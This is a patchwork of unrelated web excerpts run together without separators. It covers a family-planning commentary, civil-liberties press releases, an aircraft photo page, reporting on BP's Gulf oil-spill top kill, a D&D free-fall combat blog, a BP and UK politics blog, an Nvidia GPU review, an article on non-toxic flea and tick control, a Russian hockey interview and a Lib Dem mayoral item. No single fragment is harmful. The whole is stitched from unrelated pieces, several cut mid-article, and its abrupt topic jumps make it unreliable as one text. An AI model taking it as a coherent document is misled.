Individual rights come first , with the population health , local and global environmental benefits as welcome and important co-benefits .
In contrast , using the need to reduce climate change as a justification for curbing the fertility of individual women at best provokes controversy and , at worst , provides a mandate to suppress individual freedoms .
Although the case for family planning services should be self - evident , it needs to be carefully constructed , and sensitively handled .
( A longer version of this article , with supporting references , was published in the Bulletin of the World Health Organization : http://www.who.int/bulletin/volumes/87/11/09-072652/en/index.html)
Nick Sibilla Press Release | September 30 , 2020 California Eases Restrictions on Nurse Practitioners Late Tuesday , California Gov. Gavin Newsom signed a bill that will significantly ease restrictions on nurse practitioners ( NPs ) , nurses with advanced degrees who can diagnose symptoms , treat patients and prescribe medicine .
Prior to reform , California was one of 22 states that barred NPs from working , or even volunteering in hospitals , unless they were supervised by …
Conor Beck Press Release | September 29 , 2020 Tennessee Parents Vow to Appeal Court Ruling Against School Choice Program Arlington , Va . — This afternoon , The Court of Appeals of Tennessee at Nashville ruled that the Tennessee Education Savings Account Pilot Program Act , enacted in 2019 to give thousands of Tennessee families greater school choice , is unconstitutional under the Home Rule Amendment of the Tennessee Constitution .
Natu Bah and Builguissa Diallo , two Tennessee parents who planned to …
Andrew Wimer Press Release | September 29 , 2020 Second California Man Joins
Suit for the Right to EMT Certification Despite firefighter shortage , former inmates trained to fight forest fires are often blocked from full - time positions SACRAMENTO , Calif . — Fernando Herrera served in one of California ’s inmate fire camps .
He credits the experience with helping him turn his life around .
Even so , Fernando is unable to get certified as a first responder because of his record .
Now , Fernando is joining an existing lawsuit from the Institute for Justice ( IJ ) that challenges California ’s ban …
J. Justin Wilson Press Release | September 29 , 2020 After Being Arrested for Speaking Out , a Texas Woman Sues to Hold Gov. Officials Accountable Last year , Sylvia Gonzalez — a 72 - year - old retiree — was elected to the Castle Hills , Texas city council on the promise that she ’d work to make the city more responsive to citizens ’ needs .
But Gonzalez ’s reform agenda did not sit well with the incumbents — representing the city ’s entrenched interests — including the mayor and city manager , who residents complained did little to …
Anthony Sanders Center for Judicial Engagement | September 22 , 2020 Judicial Restraint
Is a Bargain You Ca n’t Win Earlier this month the U.S. Court of Appeals for the Eleventh Circuit upheld Florida ’s slap - dash system of forcing convicted felons to pay outstanding fines and fees before being allowed to vote .
The full court voted 6 to 4 that despite many problems , Florida could continue denying voting rights to tens of thousands of former felons …
Andrew Wimer Press Release | September 22 , 2020 South Side Pitch Competition Transforms to Help Businesses Confronting the Challenges of 2020 Public invited to pick their favorite applicants in the competition ’s semi-final round CHICAGO — Small businesses across the South Side of Chicago are finding creative solutions to confront the economic challenges of 2020 .
For a seventh year running , the South Side Pitch business competition will highlight inspirational individuals determined to improve their lives and their community .
However , unlike the past , this year the competition will focus on existing small …
Add To Album
Add To Album Like ( 72 )
Photog 's Choice
Cross-Data Photographer Stuart Freer - Touchdown- aviation Airline USA - Air Force Version Boeing F - 15E Strike Eagle Generic Type Boeing F - 15 Eagle Basic Type Boeing F - 15 Eagle Manufacturer Boeing MSN 1355 / E216 Reg. 97-0217 Code LN Location Machynlleth Loop area Region Wales Country United Kingdom Date Photographed October 30 , 2009 Cancel Search
Correction
Distinct Views : 25,413
Photo Added : May 10 , 2010
Photo Copyright © Stuart Freer - Touchdown - aviation .
All rights reserved .
Airliners .net is not affiliated with any entity mentioned or pictured herein .
All trademarks are the property of their respective owners .
Political pressures already building on the administration and Congress to do more to deal with the potential devastation facing the gulf and somehow punish BP will likely intensify if the top kill effort fails .
And the company would have to try to devise yet another possible solution to a leak that began after an explosion on the Deepwater Horizon oil rig five weeks ago .
After days of delays and testing — and the weighing of several options — BP began shooting as much as 50,000 barrels of heavy drilling fluids into the drill pipes and hoses above the well at 1 p.m. Central time .
The procedure has worked around the world to stop leaking wells , but never at the pressures and temperatures found a mile underwater .
Government and BP officials agreed to move forward with the top kill after engineers said their tests showed that the chance of stopping the oil leak was greater than the risk of making it worse .
A 30,000 horsepower engine on a ship floating above the well is pressure - pouring heavy liquids known in the oil business as “ drilling mud ” or “ kill mud ” down through drill pipes and hoses attached to the five - story - high blowout preventer sitting on top of the well .
Once the liquids have forced the oil back , the well can be cemented and shut off .
Image Ken Salazar , secretary of the interior , and David J. Hayes , right , the deputy secretary , attended a House hearing on Wednesday .
Credit ... Brendan Smialowski for The New York Times
Technicians guiding submarine robots completed diagnostic tests Wednesday morning and determined that the damaged blowout preventer and piping could withstand the pressure of the injection of thousands of pounds of heavy drilling fluids .
The Coast Guard and federal agencies monitoring the effort agreed .
Minutes before the maneuver began , one technician working with BP said he was concerned that the effort could fail within minutes .
Engineers had warned that the pressurized flow of liquids might not overcome the pressure of the oil and gas rushing from below the seabed .
Free Fall Combat in Eberron Posted by Jammi the Dungeon Mistress on January 6 , 2010 · 7 Comments
So for the second session for my first Eberron campaign , I decided to have a luxury skyship explode .
My players would then fall through the air , and have 10 rounds before they would fall onto a floating land disc encircled by a powerful magical shield .
And — you guessed it — if they hit the shield their 4th level characters would be obliterated and die .
Throughout the entire free fall , they had to fight against 16 warforge led by a warforge savage by the name of Caliber , who were all working for a disguised Rakshasa .
Had I gone drunk with power and did not fully understand the responsibility of being a DM ?
People outside of my gaming group thought I was crazy for coming up with the idea , like I was on a mission for TPK .
To appease the naysayers I pointed out that I had a back up plan in place .
I did n’t announce this to the players of course : I really wanted them to believe they were 10 rounds away from sure death .
Right after the skycoach exploded , Matthew brought out a makeshift multi-tiered grid that presented the different levels the characters would fall through during the encounter .
The look on my players ’ faces was priceless .
For those interested , here are the rules I put together for the encounter :
I closely followed Mike Krahulik ( of Penny Arcade fame ) awesome free fall rules .
Mike ’s own rules was a combination of 4E ’s flying and swimming combat .
I threw in true Eberron flavor by adding bits from the Eberron Campaign Guide ( specifically , Encounter 7 : Fight in the Skies ) .
Players had 10 rounds before becoming a mile wide smear against a magical shield .
The players would fall at a rate of one level every round .
Unless they had wicked physical skills , in which case they could slow down their descent or speed it up .
Every round , the players would have to make an athletics OR acrobatics check ( DC 15 ) .
If they scored 15 or higher , they would be able to move their full speed horizontally , OR they could move to a square directly ABOVE or BELOW .
If they failed it by 4 or less , they could move at half speed horizontally .
If they failed the check by 5 or more , they lose their move action for that round .
Additionally , the characters had access to 18 soar sleds .
The only problem really , is that those soar sleds are being used by 16 warforge , 1 bad ass warforge , and a Rakshasa pretending to be human .
In order to obtain a soarsled , the characters would have to ( a ) make a successful atheletics / acrobatics check and then ( b ) bull rush whoever was occupying a soar sled .
If they were able to knock the rider prone , they could kick off the rider and commandeer the soarsled .
If they failed the bull rush , they would fall prone on the sled , wherein they would occupy the same space .
If a character obtained a soarsled , they could fly a maximum of 8 squares as a move action .
Originally , they were supposed to HAVE to move their soarsled at LEAST one square each round or else they would start to crash .
I completely lost track of this as a DM though , rar .
( To be fair , I had murderous warforgd , a gun-wielding Rakshasa , and two damsels in distress to worry about . )
In order to calculate range , “ Look at the distance between the two creatures as if they were on the same elevation , counting squares as normal .
Then count the difference between their elevations ( each level of the free fall space is separated by 4 square , or 20ft ) .
Use the higher number to determine distance . ” ( Mike Krahulik ) .
At first I thought the encounter was n’t challenging enough because most of my players were able to procure sleds within the first round … but ah , things really got complicated after that .
Deliciously so .
As the players and the valuable NPCs they were tasked to protect fell through the levels , the tension began to mount in the room .
Did they survive ?
It was a close one , but they did more than just survive .
Three levels away from the magical shield , the warforge minions were defeated , Caliber the warforge lackey was smashed into pieces , and the Rakshasa was burned by a holy fire delivered by the team ’s Deva .
Plus , they saved the damsel (s ) in distress .
I was so proud of my boys that I almost shed a tear .
My backup plains were left unused , and my players earned an obscene amount of XP .
The real reward for me was when on my players said , “ That was the first time I was n’t afraid for my character to die .
I mean , it would suck , but man , to go out in such a cool way !
It ’s the story that matters . ”
I plan on bringing out free fall combat again sometime in the future … and raising the stakes .
* Evil DM grin *
What do you guys think ?
I look forward to hearing your thoughts .
If you enjoyed this post , kindly consider supporting us by purchasing any number of products from Amazon.com such as The Splendid Magic of Penny Arcade or the 4th Edition Player ’s Guide and 4th Edition Campaign Guide for Eberron .
The Odd British Response To American Anger At BP
Doug Mataconis · · 12 comments
One of the most striking developments over the past several days has been news of the way that some Britons seem to be reacting to American anger at BP .
It started with statements from Boris Johnson , the always outspoken Mayor London , who accused President Obama of using “ anti-British rhetoric : ”
Boris Johnson has warned that the “ anti- British rhetoric ” aimed at BP over the Gulf of Mexico oil spill is becoming a matter of national concern .
The London Mayor said that the company was paying “ a very , very heavy price ” for the consequences of an accident and pointed out that UK pension funds had a “ huge exposure ” to BP .
His comments came as BP ’s share price fell by 15.8 per cent in US trading and its London - listed stocks plunged even further , meaning that £ 57 billion has been wiped off its market value since the Deepwater Horizon disaster .
BP said that it was “ not aware of any reason which justifies this share price movement ” .
(…)
Speaking on Radio 4 ’s Today Programme , Mr Johnson said : “ I do think there ’s something slightly worrying about the anti-British rhetoric that seems to be permeating from America .
“ I would like to see a bit of cool heads and a bit of calm reflection about how to deal with this problem , rather than endlessly buck - passing and name - calling .
“ When you consider the huge exposure of British pension funds to BP and to BP ’s share price , and the vital importance of BP , it starts to become a matter of national concern if a great British company is being continually beaten up on the international airwaves . ” ( … ) “ OK , it has presided over a catastrophic accident , which it is trying to remedy , ” Mr Johnson said .
“ But ultimately it can not be faulted because it was an accident that took place and BP , I think , is paying a very , very heavy price indeed . ”
Considering the fact that BP is responsible for an industrial accident that killed eleven American citizens and is causing unprecedented damage to beaches and marshland all along the U.S. Gulf Coast , I can honestly say that I think Johnson is being more than a little cavalier in his easy dismissal of the crisis .
For one thing , it ’s not his beaches that are being inundated with oil .
For another , despite his last statement above , we do n’t really know that this was indeed an “ accident , ” or whether it was the result of gross negligence on the part of BP and the rig supervisors , as some reports indicate .
In either case , it ’s simply absurd to say that criticizing BP , or expecting them to do their job and stop the oil leak , clean up the damages , and compensate people for the damages they ’ve caused is “ anti-British . ”
Johnson is n’t alone , one columnist for the Daily Mail is saying that President Obama ’s behavior during this crisis reveals his underlying Anglophobia :
As the oil continues to gush in the Gulf of Mexico , angry rhetoric has gushed from President Barack Obama ’s lips .
His rabid denunciations of BP have damaged the interests not only of that company but of most British people , in a way that must make us wonder whether he leads a friendly country .
Vince Cable , the new Business Secretary , calls Obama ’s rhetoric ‘ extreme and unhelpful ’ ; London mayor Boris Johnson says it ’s ‘ anti- British ’ , adding that ‘ BP is paying a very , very heavy price indeed ’ .
Bemusingly , David Cameron says only that he understands the U.S. administration ’s ‘ frustration ’ , although he promises to take up the matter with Obama , after the Prime Minister returns from Afghanistan – where British troops are fighting and dying on behalf of the United States , it may be recalled .
‘ Extreme and unhelpful ’ is no exaggeration .
Obama has played to the gallery by saying that he would like to sack Tony Hayward , head of BP ; the president talks in a cheap way about ‘ kicking ass ’ .
Whether or not the American president can kick our asses , he can certainly hurt our wallets and purses .
As BP ’s share price has plummeted , it has lost £ 55 billion of its market value , and the company ’s entire outlook is very bleak , which affects most of us .
Every British insurance company , building society and pension fund has large holdings of BP shares in its portfolio .
If you have a pension , at present or in prospect , your income falls with every sour word Obama speaks .
It ’s a fine way for a friend to behave , if indeed we should regard the president as a friend .
(…)
When Obama continually refers to BP as ‘ British Petroleum ’ , which is no longer its formal name , he is saying something revealing about himself , and his Anglophobic spite will come as no surprise to those who have followed his career , and read his memoir Dreams From my Father .
He seems to have made up the part about his father being tortured by the British in Kenya , but there ’s no question that Obama nurses a disdain for and even dislike of this country .
I ’m no fan of President Obama ’s by any means , but I ’ve got to say that I find myself just a little bit stunned to see reactions like this coming from Brits who seem to be taking what is clearly justifiable anger at a company that has fallen down on the job and been less than clear with the public about the full extent of the disaster .
It would be odd , for example , to see Americans reacting the same way if an American company caused an industrial accident in another country ( the Bhopal disaster comes to mind ) .
As I write this , President Obama and Prime Minster Cameron are scheduled to talk via telephone about the crisis , although it escapes me exactly what David Cameron can do to help with an environmental crisis in the Gulf of Mexico .
Then , later today , the United States will play England in a first - round World Cup match .
These are odd days in US - UK relations for sure .
Tessellation And Anti-Aliasing
Two of the most notable areas Nvidia chose to zero in on with its Fermi architecture were geometry and anti-aliasing performance .
Each is affected in a different way , but the concept is similar for both : enable more realism and improve image quality .
Tessellation : Standardized In DirectX 11
Tessellation is nothing new , but it ’s suddenly the buzzword du jour now that it ’s a feature of DirectX 11 ( and not just limited to one vendor ’s implementation ) .
In the six months or so since Microsoft ’s latest API made its debut , we ’ve seen a couple of games with tessellation support , but they ’ve frankly not lived up to what we we ’d been amped up for by AMD .
We ’ve since seen some impressive demos from Nvidia , and the promise of what well - deployed tessellation can do certainly looks good .
Each of the GeForce GTX 480’s 15 Shader Multiprocessors and each of the GTX 470’s 14 SMs includes its own PolyMorph engine , which works with the rest of the SM to fetch vertices , tessellate , perform viewport transformation , attribute setup , and output to memory .
From our earlier look at the GF100 GPU :
In between each stage , the SM handles vertex / hull shading and domain / geometry shading .
From each PolyMorph engine , primitives are sent to the raster engine , each capable of eight pixels per clock ( totaling 32 pixels per clock across the chip ) .
Now , why was it necessary to get more granular about the way geometry was being handled when a monolithic fixed - function front - end has worked so well in the past ?
After all , has n’t ATI enabled tessellation units in something like six generations of its GPUs ( as far back as TruForm in 2001 ) ?
Ah , yes .
But how many games actually took advantage of tessellation between then and now ?
That ’s the point .
Ever since the days of Nvidia ’s GeForce 2 architecture , we ’ve been hearing about programmable pixel and then vertex shading .
Now we ’re getting some very impressive shaders able to add tremendous detail to the latest DirectX 9 and 10 games ( Nvidia claims a 150 x increase in shading performance from the GeForce FX 5800 - series to GT200 ) .
But I know we ’ve all seen some of the terri-bad geometry that totally ruins the guise of realism in our favorite games .
Purportedly , the next frontier in augmenting graphics realism involves cranking the dial on geometry .
… in order to facilitate the performance needed to make tessellation feasible , Nvidia had to shift away from that monolithic front - end and toward a more parallel design .
Hence , the four raster and ( 15 or 14 , depending on the card ) PolyMorph engines .
The company naturally has its own demos that show how much more efficient GF100 is versus the Cypress architecture , which employs the “ bottlenecked ” monolithic design — however , we ’ll want to compare the performance of a title like Aliens Vs. Predator from Rebellion Developments with tessellation on and off to weigh a more balanced app .
Up front , though , Nvidia claims that GF100 enables up to 8 x better performance in geometry - bound environments than GT200 .
It turns out the AvP is n’t the best game to measure tessellation performance — the technology is only applied to alien models , and it ’s hardly a “ geometry - bound environment . ”
Thus , we ran the Unigine Heaven 1.0 benchmark on all of our DirectX 11 - capable cards to better gauge the efficiency of each architecture when tessellation is applied :
The way these cards fall is fairly expected , but it ’s interesting to note the drop - off in performance when turning tessellation on .
The Radeon HD 5970 , 5870 , and 5850 retain 66 % , 65 % , and 65 % of their original performance , respectively .
The GeForce GTX 480 and 470 retain 83 % and 83 % of their performance , respectively .
It ’s fair to say that the Fermi architecture certainly gives up less performance than AMD ’s design .
But remember this is one component of next - generation games , and it ’s not yet being used as intensively as the latest demos might suggest .
For that , we ’ll need mid-range cards enabling the technology in a broader market .
AMD has them , but Nvidia still does n’t .
As DirectX 11 hardware sees greater adoption , game developers will dedicate more attention to enhancing their titles with it .
Update :
If you want to get even more theoretical about the way GF100 's distributed PolyMorph design handles tessellation scaling , check out the following chart :
This is the Unigine Heaven 2.0 benchmark cranked all the way up to Extreme .
Though it 's a fairly unrealistic implementation of tessellation ( there 's diminishing returns on the geometry created here ) , it conveys how well GF100 handles an increased tessellation load versus Cypress .
GeForce GTX 480 is retaining 60 % of its performance , while Radeon HD 5870 is down to 39 % of its baseline frame rate .
Anti-Aliasing : Now with More Vitamin CSAA
The concept of burning through horsepower came up when we started talking about the Radeon HD 5800 - series cards , and it ’s relevant here , too .
AMD and Nvidia both have all of this potential performance at their disposal .
AMD is using features like Eyefinity to expand beyond 30 ” LCDs to render across larger surfaces , making the case for higher - end GPUs .
Nvidia is using 3D Vision Surround to do the same thing , plus throwing more complex PhysX effects at the graphics processor .
In the same vein , GeForce GTX 480 and 470 also support 32 x coverage sampling anti-aliasing , which decouples coverage from color / z/ stencil data , and thus reduces the bandwidth and storage costs of applying AA versus MSAA .
Using a little Battlefield : Bad Company 2 at 1680x1050 , we tested Nvidia ’s various anti-aliasing techniques .
Naturally , Nvidia ’s GeForce GTX 285 is slower than the GTX 480 , so look instead to the scaling chart , which shows the benefit of GF100 ’s enhanced ROP performance .
As the AA is slowly cranked up , the GeForce GTX 480 loses less of its frame rate than GTX 285 .
And at the 32x CSAA setting , it ’s impressive to see the GeForce GTX 480 running at nearly 80 % of its baseline speed sans AA .
Clearly , if you have the performance to spare , turning on anti-aliasing is a good way to improve image quality here .
Learn about non-toxic methods you can use for flea and tick control .
Does flea and tick control have you scratching your head ?
Keep you and your pals happy with these least - toxic methods .
It 's a barely noticeable sensation , just a whisper of a tickle .
You reach to brush away what you expect will be nothing mo re than a fly or stray piece of hair , only to discover a blood - sucking intruder seeking its next meal — on you .
What 's disconcerting is n't the discovery of that first flea or tick , but the creepy crawly feeling that if you 've found one , many more are lurking nearby to take its place .
If you have animals — and what 's a happy homestead without them — fleas and ticks are an uncomfortable fact of life for you and your pet .
More than a nuisance , fleas and ticks can transmit a host of pathogens and skin diseases to humans and their furry counterparts .
But you do n't have to risk disease or watch your pets suffer .
With a little diligence and the help of some new pest controls , you can get the upper hand during flea - and - tick season .
There are more than 3,000 different species of flea , but here in North America the most common one is Ctenocephalides felis , the cat flea .
Despite their name , these fleas are just as happy to reside on your dog .
A flea's life span goes through four stages .
Research has shown about 5 percent of the fleas that infest your home are adults .
The bulk of indoor flea populations are made up of pupae ( 10 percent ) , larvae ( 35 percent ) and eggs ( 50 percent ) .
Many common pesticides used to eradicate these pests kill only adult fleas , leaving 95 percent of the flea problem behind to leap up time and again .
A female flea can lay up to 50 eggs each day .
Before laying eggs , the flea must find a blood meal — not an easy quest .
Fleas have poor eyesight and rely primarily on air currents and carbon dioxide to locate hosts .
As your family pet trots by , the tenacious flea jumps up and down , sometimes thousands of times , before it hitches a tide .
Once on board , the flea secretes saliva onto the target area to soften the skin and make the blood flow readily .
It 's this saliva , not the actual bite , that causes the allergic reactions in pets and humans .
After her blood meal , the flea begins laying eggs on her host .
Pets usually remove some of the eggs while grooming themselves ; others fall off as the animal moves from place to place .
In about 10 days , the larvae emerge .
Anyone who has ever suffered through a severe flea infestation knows it 's a situation that can drive even the most mild - mannered environmentalist to contemplate reaching for a hard - core pesticide arsenal .
But that 's only a short - term solution .
Besides being ineffective in the long run , those chemicals contribute to indoor air pollution and subject you and your family to residual exposure for weeks or even months after they 're applied .
This can be particularly dangerous for young children , who may crawl on treated carpets and floors .
Their developing bodies are more sensitive than adults to the effects of pesticides .
Collars infused with pesticides emit a constant stream of vapors into the air whether or not there are fleas present , and both you and your pet constantly breathe these vapors .
According to one study , using pesticides in the home , including flea collars , may increase the risk of childhood cancer .
In addition , pesticides can irritate your pet 's skin .
Herbal remedies are n't necessarily the solution either , says Michael Dryden , professor of veterinary parasitology at Kansas State University in Manhattan , Kansas .
Considered a leading expert on flea control , Dryden says natural flea preventives , such as adding garlic to the pet 's food or using the aromatic oils of cedar , lavender , mint and rosemary , are ineffective .
Some herbal treatments , such as citrus extracts or pennyroyal , can be toxic to pets and humans .
" Both dogs and cats have died as the result of accidental ingestion of pennyroyal oil , " Dryden says .
" Pets can ingest the oil while grooming themselves , and the oil is toxic to their liver and kidneys . "
And feeding animals brewer 's yeast , another popular folk remedy , may have opposite the intended effect .
" We actually use brewer 's yeast to feed fleas when we 're raising them for experiments , " Dryden says .
" They love it .
The yeast increases their numbers by 40 to 50 percent . "
Preventive Maintenance for Fleas
The good news is prevention is the best approach to flea control .
The bad news is you 'll have to vacuum and vacuum and vacuum .
" You can eliminate up to 50 percent of flea eggs in a single pass with a vacuum , " Dryden says .
His experiments done on nylon carpets have shown vacuuming provides the same level of control at the pupal stage as permethfin , a widely used synthetic pesticide .
Dryden recommends vacuuming carpets at least once a week or as often as every day during peak flea season , usually middle to late summer .
Pay special attention to any areas where your pets may lie and remember to clean underneath sofas and chairs .
Wash pet bedding regularly and vacuum cushions , pillows and between crevices on upholstered furniture .
Dryden suggests removing the vacuum bag weekly and tossing it in an outdoor trash container .
You wo n't want to allow a flea - infested Fluffy or Fido into your freshly cleaned home , so treat them to an occasional shampoo .
No need to lather them up with a pesticide - infused potion : Plain soap and water usually will drown the fleas .
just work up a good suds and allow it to stand for a few minutes before thoroughly rinsing your pet .
- Advertisement -
Flea combs are another good method for controlling mild infestations of adult fleas .
These combs have tightly spaced teeth that comb out fleas and their manure ( which serves as food for the larvae ) , but still allow hair to pass through .
Dip the comb into soapy water to dislodge and drown the fleas .
Pets usually enjoy the extra attention , and by combing regularly , you 'll be able to monitor the flea population and spring into action if numbers begin to swell .
Outdoors , fleas are highly susceptible to fluctuations in temperature and moisture .
They like damp environments , but they 're also vulnerable to drowning .
Mow infested lawn areas short , and allow them to dry out during the heat of summer if possible .
Dryden says fleas are found most often in moist , shaded areas such as under porches and around dog pens .
He says to use your garden hose to give the shady areas a good flooding .
" Run the hose until you have mud puddles and you 'll drown the fleas . "
Tackling Ticks
Ticks rank right up there with bats , snakes and spiders as creatures that elicit fear and disgust at the mete mention of their name .
While most of these creepy crawlers have beneficial characteristics , ticks truly deserve to be given a wide berth .
These blood - sucking parasites are carriers of several diseases , most notably Lyme disease .
First appearing in the Northeast in the late 1970s , it is slowly making its way along riverbanks in Mid-Atlantic states toward the Midwest .
Frequent vacuuming controls fleas effectively .
Toss out the cleaner bag once a week so it does n't become a fleabag hotel .
Ticks belong to the class Arachnida , which counts mites , spiders and scorpions among its members .
There are more than 850 species of tick .
Their ravenous appetite for blood enables them to transmit diseases such as Rocky Mountain spotted fever ; ehrlichiosis , a sometimes - deadly disease with flu - like symptoms ; tularemia , which causes skin sores ; and babesiosis , a disease similar to malaria .
Just last year , the Centers for Disease Control and Prevention announced that a new tick - borne disease , Powassan encephalitis , had appeared in New England .
Some scientists say there may be other tick borne illnesses that have n't been identified .
Infinitely patient creatures , ticks make their way onto the edges of leaves and branches , then stretch out their legs and hitch a ride on a passing host .
Deer and mice are among their favorite means of transportation .
After they 've found their meal ticket , ticks wander on their hosts ' bodies until they can find a suitable place to dig in and feed .
A female tick will feed for three days to a week and increase as much as 200 times in weight before she 's had her fill .
Once satiated , she falls to the ground where she lays 1,500 to 2,000 eggs .
Her progeny emerge and begin the cycle all over again .
Many ticks , particularly those that infest dogs , are known as three - host ticks .
with each stage of life larva , nymph and adult — the tick feeds , drops off and transforms , then moves on to another host .
If you find yourself compelled to venture into areas likely to be infested with ticks , cover up with light - colored clothing so you can see ticks easily and pick them off before they find their way to your skin .
Tuck long - sleeve shirts into long pants tucked into socks to eliminate entry points .
Check for ticks regularly while outdoors .
Once you 're indoors , strip off your clothing and toss it into the washer .
Shower , then inspect yourself thoroughly ( or invite someone to do it for you ) , paying special attention to your back , underarms and areas covered by hair
You can identify heavily infested areas around your home by making a tick drag .
Attach a couple of yards of white flannel to a long stick , then sweep the cloth along suspected areas of your yard .
Those ticks that have been waiting so patiently with outstretched arms will cling to the cloth , where you 'll be able to spot them easily .
Drop the cloth into a pail of soapy water to drown the ticks you 've snared .
Create the conditions ticks abhor by keeping vegetation around your home cut short , so summer sun and breezes can keep your yard dry .
Studies have shown removing leaf litter under shrubs and trees can also significantly reduce tick populations .
Sprinkling diatomaceous earth — the tiny sharp - edged skeletons of sea creatures called diatoms — onto your pet 's bedding works well to kill any fleas or ticks that fall off .
Diatomaceous earth , which is available at most garden centers , dries out the bodies and eggs of fleas and ticks , killing them .
A Fowl Approach : Guinea Hens
Free -range chickens , turkeys and guineas will feed on ticks and other pests , such as grasshoppers , Japanese beetles and mosquitoes .
Guineas in particular are relentless insect -eaters .
The Guinea Fowl Breeders Association ( www.gfba.org) reports 65 percent of its members have noticed radical declines in tick populations after they began keeping guineas .
( For information on raising guineas , read Gardening with Guineas , by Jeannette S. Ferguson ) .
Follow flea-elimination procedures to keep tick numbers under control : Vacuum floors and launder bedding frequently .
Inspect pets regularly and remove any ticks you find .
Flea combs will catch ticks as long as the critters have n't attached themselves to your pet 's skin .
If you find a tick that 's already attached , remove it carefully using tweezers .
( See " How to Remove a Tick " at the end of this article . )
A New Generation of Flea and Tick Pesticides
In the past when fleas and ticks got seriously out of control , there was little choice but to flood your home with toxic pesticides .
One of the most widely used flea controls , chlorpyrifos ( used in Dursban and many other products ) was on the market for more than 35 years before it was finally withdrawn from use in indoor foggers and pet shampoos .
Other uses were restricted because the Environmental Protection Agency concluded chlorpyrifos was associated with chronic neurobehavioral effects and multiple - chemical sensitivity .
Fleas and ticks have become resistant to most pesticides used against them , prompting companies to continually develop new products , to which the pests eventually also develop resistance .
The newest generation of flea - control pesticides became available in the mid-1990s .
Some of these products act as long - term controls by preventing fleas from laying viable eggs .
Others are low - toxicity pesticides you apply once a month between your pet 's shoulders to kill fleas quickly and steadily for a period of several weeks .
Thus far , these new pesticides appear less toxic than chlorpyrifos , although it 's worth remembering it took 35 years for the problems with chlorpyrifos to become apparent .
Though these are chemical controls , Michael Dryden , professor of veterinary parasitology at Kansas State University in Manhattan , Kansas , says they 're relatively safe and far superior to what 's been used in the past .
Although some topical liquid treatments can leave behind pesticide residues where pets lie , the toxicity is below what the EPA describes as the " No Observed Effect Level . "
Most of these products are available only through veterinarians .
Less expensive over - the - counter products are available , but their effectiveness varies widely .
Some , such as permethrin , are toxic to cats .
Here are some of the newer products you might want to consider :
Lufenuron — Marketed under the brand - name Program , lufenuron is a pill you give your dog once a month ( other formulations are available for cats ) .
When they bite into the animal , female fleas are exposed to the insecticide , which prevents their eggs from developing .
Although rare , adverse reactions to lufenuron can include vomiting , diarrhea and loss of appetite .
Imidacloprid — Sold as Advantage , this treatment is applied between the animal 's shoulders and disperses over its body over several hours .
Avoid petting the animal for 24 hours after application .
Dryden 's research has shown
Advantage kills more than 97 percent of fleas inside the home for at least 28 days .
Fipronll —
Sold under the brandname Frontline , this is another spot - on treatment .
It mixes with the oils in your pet 's skin and settles in the sebaceous glands , where it continues to be effective for a month or more .
Found by Dryden to be more than 98 percent effective in controlling fleas , fipronil also kills ticks .
Selamectin —
A new topical liquid treatment sold as Revolution , selamectin is labeled for control of fleas , ticks , heartworm , roundworm and hookworm in cats .
Use any of these products sparingly .
Dryden says fleas and ticks inevitably will develop some resistance , but when you combine mechanical methods ( vacuuming , washing bedding ) and judicious use of spot - on treatments , the process will be slowed .
How to Remove a Tick
If you find a tick attached to your skin , do n't panic .
It usually takes eight to 48 hours for a tick to transmit diseases after it 's dug in .
The absolute worst thing you can do is squeeze its body with your fingers , which forces the contents of the tick 's stomach into your bloodstream .
Forgo the old advice to coat the tick with petroleum jelly or burn it with a match to get it to release its grip , these methods are ineffective .
Instead , use tine - point tweezers to grasp the tick by the head , getting as close to the skin as possible .
Pull slowly and gently to remove the tick , then clean the bite wound and wash your hands and tweezers .
Light Traps for Fleas
Ever go away on vacation and return to find your home infested with fleas ?
While your pet was away , the fleas were at play , still laying eggs , eating organic debris on the carpet , multiplying exponentially and waiting eagerly for their next blood meal .
But you can put flea control on autopilot while you 're away with a simple light trap .
Hang a lightbulb 6 to 12 inches above a pan of soapy water or a board covered with sticky paper ( like duct tape ) on the floor .
In the absence of a warm body , fleas will be attracted to the heat of the bulb and hop to their soapy or sticky grave .
Sergei Gaiduchenko : “ You ca n’t judge me by one game only ” ( Photo © Yarsport.ru )
Young goalie Sergei Gaiduchenko , who was drafted by the Florida Panthers in the 2007 NHL Entry Draft , had a rocky season with Lokomotiv Yaroslavl .
He gave an interview to Russian sport site Yarosport .ru in which he tried to analyze the situation .
Let ’s remember that his contract with Lokomotiv ran out on April 30th and he ’s still yet to sign .
Sergei , do you have an explanation regarding your benching at the end of the season ?
Sergei Gaiduchenko : “ Honestly speaking , no .
After the end of the regular season the coaches told me to get ready to play for the second team ( Loko in the MHL ) .
No one told me explanations or complains about my game . ”
Did you try talking about your fate with the team with the staff boards ?
Sergei Gaiduchenko : “ I would n’t have been against such a discussion , but I had to focus on the playoffs , and then this argument lost sense . ”
How the move to MHL can affect your career ?
Sergei Gaiduchenko : “ From one hand I practiced with the goalie coach that followed me a lot , Sergei Kotov .
But on the other hand I lacked game practice against men and interaction with experienced defensemen .
I was n’t prepared to play with 91 or 92 born players . ”
Did n’t the release of goalie coach Ilari Näckel decrease your level of play ?
There were rumors that no one cared about you and you had to work by youself .
Sergei Gaiduchenko : “ Anyway , if this had an impact , it was n’t on me only .
And about working by myself , these were n’t my words . ”
It ’s understable that you played less than starting goalkeeper Georgi Gelashvili .
Almost in all teams there is a starting goalie and a reserve .
How did you deal with this during the practices and after the demotion to MHL ?
Sergei Gaiduchenko : “ I work hard in the practices .
And in the games in which I played I played practically at the same level as Georgi [ Gelashvili ] .
If you want the proof , just look at the stats . ”
But then how to explain the four goals you allowed in your very first KHL game ?
Sergei Gaiduchenko : “ Well , then how to explain the five goals allowed in two periods by [ Spartak ’s goalie Dmitri ] Kochnev in the first game of the playoff series against them ?
( Note , Kochnev recently signed with Lokomotiv )
Of course , a goalie has to save everything .
But you ca n’t judge by one game only . ”
Your contract is now over .
Did you change your plans according to the latest events ?
Sergei Gaiduchenko : “ Generally speaking I would n’t want to burn the bridges with the team .
But I also do n’t like to live in such state of uncertainity . ”
Like Russian hockey ?
Join our forum and get involved !
Colourful Lib Dem keen to run for the post if he has his party 's blessing
A charismatic politician with an exotic heritage , a talent for self - promotion and sufficient levels of public recognition to make a surname surplus to requirements is once again plotting to win control of London .
Lembit Öpik , the colourful Liberal Democrat who lost his Welsh seat last month , has said he will run for the job of London mayor if he wins his party 's blessing .
" If there 's enough interest in London to do it , I 'll stand , " he told the Guardian today as he prepared to join Billy Bragg on stage at Glastonbury .
" I 've had a conversation with the leadership and they say they wo n't take a final position .
I 'm not narcissistic or precious about it .
If the party does n't want me to stand then I 'll respect that . "
